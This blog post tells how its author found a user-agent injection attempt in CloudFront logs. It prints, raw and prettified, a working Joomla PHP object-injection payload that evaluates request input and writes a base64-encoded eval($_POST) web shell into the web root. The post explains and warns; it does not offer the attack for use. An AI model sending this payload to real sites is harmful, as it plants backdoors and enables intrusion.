An Accidental HTTP Honeypot

July 12, 2019

Lately I’ve been busy with some projects (some with my dear friend Gonçalo Tomás), which may be the subject of other posts later in the Summer. One of such projects is built on top of AWS, using services ranging from Lambdas to CloudFront, S3, API Gateway, etc. I won’t talk much about these services for now, but one of my favourite features of CloudFront (or AWS in general) is how easily every service plugs in with others. In particular, we use CloudFront’s logs for our analytics, since it logs every request and puts it into neat CSV files in an S3 bucket that we can later parse into beautiful graphics. It’s a great update since the last time I used analytics for a site and they looked like this:

Not necessarily in French. But you get the idea.

Not necessarily in French. But you get the idea.

Getting user-agent injections

While checking those logs (mainly for curiosity, to see where people are coming from), I noticed a pretty long and weird line – among the thousands of lines from bots trying to check our unsafe Wordpress installation that doesn’t exist. A particular line had a pretty long field that looked like this:

}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:46:"eval($_REQUEST[1]);JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";b:1;}𝌆    1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo \'->|\';file_put_contents($_SERVER[\'DOCUMENT_ROOT\'].\'/webconfig.txt.php\',base64_decode(\'PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+\'));echo \'|<-\';

I checked and it was the user-agent string. Must be some kind of bug, I thought. Then I prettified it and the meaning became more clear:

__test|O:21:"JDatabaseDriverMysqli":3: {
    s: 2: "fc";
    O:17:"JSimplepieFactory":0: {}

    s: 21: "\\0\\0\\0disconnectHandlers";
    a:1: {
        i: 0;
        a:2: {
            i: 0;
            O:9:"SimplePie":5: {
                s: 8: "sanitize";
                O:20:"JDatabaseDriverMysql":0: {}
                s: 8: "feed_url";
                s: 46: "eval($_REQUEST[1]);JFactory::getConfig();exit;";
                s: 19: "cache_name_function";
                s: 6: "assert";
                s: 5: "cache";
                b: 1;
                s: 11: "cache_class";
                O:20:"JDatabaseDriverMysql":0: {}

𝌆 1=@ini_set("display_errors", "0");
echo \'->|\';file_put_contents($_SERVER[\'DOCUMENT_ROOT\'].\'/webconfig.txt.php\',base64_decode(\'PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+\'));echo \'|<-\';

What are we looking at

This is what I’d like to call a user-agent injection: these guys are trying to inject code into some unsafe analytics parser! In that way we’ve inadvertently created an HTTP honeypot, since the malicious code does not come near any kind of language or interpreter that might execute it, so I think we’re safe for now… I’ve since learned that this code in particular targets Joomla!, an outdated content-management system, kind of like Wordpress with its many vulnerabilities.

The attack is not new, but it made me even more aware of the many weird ways hackers find to break stuff, and how you can never be to careful. After all, HTTP headers are user input too.

PS: Not entirely related, but the idea of using things not for their intended purpose reminded me of how you can use DNS to download files.